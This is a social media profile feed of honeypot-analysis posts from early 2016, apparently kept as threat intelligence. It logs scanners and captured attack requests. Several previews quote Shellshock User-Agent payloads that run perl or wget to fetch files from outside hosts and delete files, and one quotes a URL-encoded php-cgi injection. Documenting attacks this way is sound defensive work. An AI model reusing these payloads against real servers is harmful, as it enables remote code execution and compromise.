Profile cover photo
Profile photo
Jörg Stephan
19 followers
19 followers
About
Jörg's posts

Post has attachment
end of life
Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots have had some issues. The vservers will be going down soon. So no more analytics. Thanks to Swen for ha...

Post has attachment
159.226.162.196 - #perl wget via 204.232.209.188
BEGIN OF HTTP DATA: 2016-02-11 19:15:33 Source IP: 159.226.162.196 GET HTTP/1.1 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget...

Post has attachment
61.49.45.47 - WhatWeb/0.4.8-dev (first time seen)
BEGIN OF HTTP DATA: 2016-01-23 16:47:13 Source IP: 61.49.45.47 GET / HTTP/1.1 User-Agent: WhatWeb/0.4.8-dev Host: 109.234.106.8:8080 Connection: close Accept: /  For more information https://user-agents.me/crawler/whatweb048-dev According to some news in ...

Post has attachment
213.136.72.84 . Shellshock perl via 204.232.209.188
BEGIN OF HTTP DATA: 2016-01-20 09:58:59 Source IP: 213.136.72.84 GET HTTP/1.1 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget h...

Post has attachment
92.45.197.218 - Zollard php execution
BEGIN OF HTTP DATA: 2016-01-21 09:47:25 Source IP: 92.45.197.218 POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F %66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F...

Post has attachment
Scanner seen on January 14, 2016
185.130.5.207 - muieblackcat 37.142.32.222 - masscan/1.0 149.78.19.136 -  masscan/1.0 195.169.125.87 -  zgrab/0.x  185.130.5.235 -  muieblackcat 185.130.5[.]207 Whois Data (TeamCymru) AS : 203569 IP : 185.130.5.207 BGP Prefix : ...

Post has attachment
83.54.165.57 - Shellshock wget via http://192.192.78.216:9090
BEGIN OF HTTP DATA: 2016-01-13 08:48:44 Source IP: 83.54.165.57 GET /cgi-bin/authLogin.cgi HTTP/1.1 Host: 127.0.0.1 User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php...

Post has attachment
Scanner seen on January 11,12 2016
208.100.26.231 - Nmap Scripting Engine 141.212.122.81 -  zgrab/0.x 141.212.122.145 -  zgrab/0.x 208.100.26[.]231 Whois Data (TeamCymru) AS : 32748 IP : 208.100.26.231 BGP Prefix : 208.100.0.0/18 CC : US Registry : arin Alloca...

Post has attachment
*85.73.42.84 - wget via http://lliillii.altervista.org/io.php*
BEGIN OF HTTP DATA: 2016-01-08 10:07:22 Source IP: 85.73.42.84 GET /cgi-bin/authLogin.cgi HTTP/1.1 Host: 127.0.0.1 User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1 85.73.42[.]84...

Post has attachment
Scanner seen on January 9, 2016
93.174.93.203 - masscan/1.0 141.212.122.145 - zgrab/0.x 69.30.217.226 - muieblackcat 93.174.93[.]203 Whois Data (TeamCymru) AS : 29073 IP : 93.174.93.203 BGP Prefix : 93.174.88.0/21 CC : NL Registry : ripencc Allocated : 20...
Wait while more posts are being loaded